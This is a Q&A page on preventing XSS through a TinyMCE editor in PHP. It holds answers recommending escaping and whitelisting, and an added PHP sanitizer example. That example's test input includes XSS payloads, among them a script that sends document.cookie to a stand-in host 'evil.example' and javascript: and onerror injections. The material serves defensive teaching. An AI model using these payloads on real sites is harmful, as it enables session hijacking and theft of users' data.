TinyMCE security question: how to prevent malicious input?

How to prevent malicious input in WYSIWYG editors like TinyMCE?

I have a system with users who do not have "technical skills" (therefore no WMD) and need a rich text editor that places its content in a database.

I am worried about script attacks and malicious input codes.

+7
javascript security php tinymce codeigniter
3 answers

If you only need secure HTML, you should use an HTML cleaner. If you want to protect against XSS and block all HTML, you should use $var=htmlspecialchars($var,ENT_QUOTES);

+14

You cannot prevent client input. You can add things to interfere (or try), but it will always be trivial to send malicious code. You NEED to sanitize in PHP.

ALWAYS ALWAYS ALWAYS escape user-submitted content before displaying it (htmlentities will usually take care of this for you).

If you want to have an HTML message (as you say, you want WYSIWYG), you need a whitelist to clean the HTML that was sent. When I say whitelist, I mean both the tag name and the attribute.

I am not familiar with CodeIgniter, but found this one that looks like it can do what you want ...

0
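The two strategies the answers above describe, as an added example in PHP that is not code from the question, the answers, TinyMCE or CodeIgniter: escaping everything with htmlspecialchars(..., ENT_QUOTES) for a field that must not contain HTML, and a tag-name-plus-attribute-name whitelist, applied server side with DOMDocument, for rich text. The whitelist ALLOWED_TAGS, the helper names (escape_for_html, safe_href, clean_node, clean_html) and the sample payload are this example's own assumptions.

```php
<?php
// Added example, not code from the original question or answers.
// Server-side handling of content submitted from a WYSIWYG editor:
//   1. escape_for_html(): the field must not contain HTML at all
//      (first answer: htmlspecialchars with ENT_QUOTES);
//   2. clean_html(): the field is rich text, so keep only a whitelist of
//      tag names AND attribute names (second answer), plus a scheme check
//      on href so that javascript: links do not survive.
// ALLOWED_TAGS, safe_href() and the payload below are assumptions of this
// example; a production system would rather use a maintained HTML cleaner.
declare(strict_types=1);

// Strategy 1: no HTML allowed, escape everything.
function escape_for_html(string $s): string
{
    // ENT_QUOTES also escapes the single quote, so the value is safe inside
    // single-quoted attributes too; ENT_SUBSTITUTE keeps invalid UTF-8 from
    // making htmlspecialchars() return an empty string silently.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Strategy 2: rich text. Tag name => list of allowed attribute names.
// Anything not listed (script, iframe, img, style, on* handlers, ...) is dropped.
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'b' => [], 'strong' => [], 'i' => [], 'em' => [],
    'u' => [], 'ul' => [], 'ol' => [], 'li' => [], 'h2' => [], 'h3' => [],
    'blockquote' => [],
    'a' => ['href', 'title'],
];

function safe_href(string $url): bool
{
    // The DOM parser has already decoded entities (&#106;avascript: is
    // plain "javascript:" here). Browsers ignore tabs/newlines inside a
    // scheme, so strip ASCII controls and spaces before looking at it.
    $url = preg_replace('/[\x00-\x20]/', '', $url);
    if (preg_match('#^([a-z][a-z0-9+.-]*):#i', $url, $m)) {
        return in_array(strtolower($m[1]), ['http', 'https', 'mailto'], true);
    }
    return true; // relative URL, no scheme to abuse
}

function clean_node(DOMNode $node): void
{
    // Walk a copy of the child list: we remove children while iterating.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMText) {
            continue; // text is re-escaped by saveHTML() on output
        }
        if (!$child instanceof DOMElement) {
            $node->removeChild($child); // comments, processing instructions
            continue;
        }
        $tag = strtolower($child->tagName);
        if (!isset(ALLOWED_TAGS[$tag])) {
            $node->removeChild($child); // drop element and its whole subtree
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            $ok = in_array($name, ALLOWED_TAGS[$tag], true);
            if ($ok && $name === 'href' && !safe_href($attr->value)) {
                $ok = false;
            }
            if (!$ok) {
                $child->removeAttribute($attr->name);
            }
        }
        clean_node($child);
    }
}

function clean_html(string $html): string
{
    $doc = new DOMDocument();
    // Wrap the fragment in a document whose charset is declared, and
    // silence libxml warnings about the sloppy markup browser editors emit.
    $prev = libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><head>'
        . '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
        . '</head><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    clean_node($body);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed payload: what a user can POST directly, whatever TinyMCE
// shows or filters in the browser.
$submitted = '<p onclick="alert(1)">Hello <b>world</b></p>'
    . '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    . '<a href="&#106;avascript:alert(2)">click</a>'
    . '<a href="https://example.com" title="ok">fine</a>'
    . '<img src=x onerror="alert(3)">';

echo clean_html($submitted), "\n";
echo escape_for_html("<script>alert('x')</script>"), "\n";
```

Run it with `php clean.php`. The cleaning has to happen in the request handler before the content is written to the database (or at least before it is rendered), never only in the editor's JavaScript, since the browser-side configuration is under the attacker's control. A hand-written whitelist like this is enough to see the principle; for real deployments a maintained cleaner such as HTML Purifier covers far more parser edge cases than this example does.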
